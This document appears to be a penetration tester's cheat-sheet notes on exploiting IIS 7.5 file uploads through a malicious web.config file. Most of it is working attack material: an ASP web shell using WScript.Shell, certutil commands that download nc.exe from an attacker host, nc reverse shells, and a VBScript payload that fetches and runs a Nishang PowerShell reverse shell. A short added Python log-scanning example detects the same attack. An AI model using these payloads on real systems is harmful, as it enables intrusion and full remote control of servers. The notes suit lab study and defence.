IIS
IIS Versions
REF: IIS6WebDav
80 http Microsoft IIS httpd 7.5
IIS 7.5 = Windows 2008 R2
IIS Uploads
If you can upload to an IIS site, keep trying to see which extensions are allowed
test.txt ..fail
test.asp ..fail
test.aspx ..fail
test.jpg ..ok
web.config ..ok - we can exploit
RCE webconfig upload
Old version of IIS 7.5 that accepts file uploads
We can transfer our 'web.config' that includes some evil-aspx at the bottom
REF: RevWebShellsAsp
-------------------------------
vi web.config ..evil asp code at bottom
Response.write(1+2) ..test will equal 3
-------------------------------
cat /opt/shells/web.aspx
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
Set cmd = rs.Exec("cmd /c ping 10.x.x.x")
o = cmd.StdOut.Readall()
Response.write(o)
%>
-------------------------------
Execute:
http://10.x.x.x/UploadedFiles/web.config
-------------------------------
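Defender-side view of the request above, as an added example that is not part of the original notes: IIS request filtering normally answers a request for a .config file with a 404, so a 2xx response for one in the W3C access log is worth alerting on. The log lines are constructed, and the /UploadedFiles/ prefix and the extension list are assumptions based on the URL in these notes.

```python
# Added example: flag IIS W3C log entries where a .config file was served,
# or where a script-type file was served from the upload directory.

# Constructed sample log (not taken from a real server).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status sc-substatus
2024-01-01 10:00:01 GET /index.html - 192.0.2.10 200 0
2024-01-01 10:00:05 GET /web.config - 192.0.2.10 404 8
2024-01-01 10:01:10 POST /transfer.aspx - 192.0.2.77 200 0
2024-01-01 10:01:15 GET /UploadedFiles/web.config - 192.0.2.77 200 0
2024-01-01 10:01:20 GET /UploadedFiles/photo.jpg - 192.0.2.77 200 0
2024-01-01 10:02:00 GET /UploadedFiles/page.aspx - 192.0.2.50 200 0
"""

UPLOAD_PREFIX = "/uploadedfiles/"  # assumption: upload path as in the URL above
SCRIPT_EXTS = (".config", ".asp", ".aspx", ".ashx", ".asmx")  # assumed list


def find_suspicious(log_text):
    """Return (rule, client_ip, uri) tuples for successful risky requests."""
    fields, hits = [], []
    for raw in log_text.splitlines():
        line = raw.strip()
        if line.startswith("#Fields:"):
            # W3C logs declare their own column order; honour it.
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or not fields:
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed or truncated entry
        row = dict(zip(fields, values))
        stem = row.get("cs-uri-stem", "")
        if not row.get("sc-status", "").startswith("2"):
            continue  # blocked or failed requests are not the signal here
        lowered = stem.lower()
        if lowered.endswith(".config"):
            hits.append(("config-served", row.get("c-ip", "-"), stem))
        elif lowered.startswith(UPLOAD_PREFIX) and lowered.endswith(SCRIPT_EXTS):
            hits.append(("script-in-upload-dir", row.get("c-ip", "-"), stem))
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(*hit)
```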
Catch a ping (did my command work?)
tcpdump -i tun0 icmp
Easy
-----------------------
We will use web.config exploit
First web.config will download nc
python -m SimpleHTTPServer 8080
rs.Exec("cmd /c certutil -urlcache -f http://10.x.x.x:8080/nc.exe C:\Windows\Temp\nc.exe")
Second web.config will execute nc reverse
rs.Exec("cmd /c C:\Windows\Temp\nc.exe 10.x.x.x 4444 -e cmd.exe")
nc -nvlp 4444
whoami
merlin
systeminfo
-----------------------
google iis rce upload
Set cmd1 = wShell1.Exec("certutil -urlcache -split -f http://10.x.x.x:8080/nc.exe C:\\users\\public\\nc.exe")
Set cmd1 = wShell1.Exec("cmd /c c:\users\public\nc.exe 10.x.x.x 4444 -e c:\windows\system32\cmd.exe")
0xdf wrote this easy one:
To download our Nishang reverse shell and execute it
prep
https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1
Add a reverse call as the last line:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.5 -Port 443
share with python
<%@ Language=VBScript %>
<%
call Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.x.x.x/Invoke-PowerShellTcp.ps1')")
%>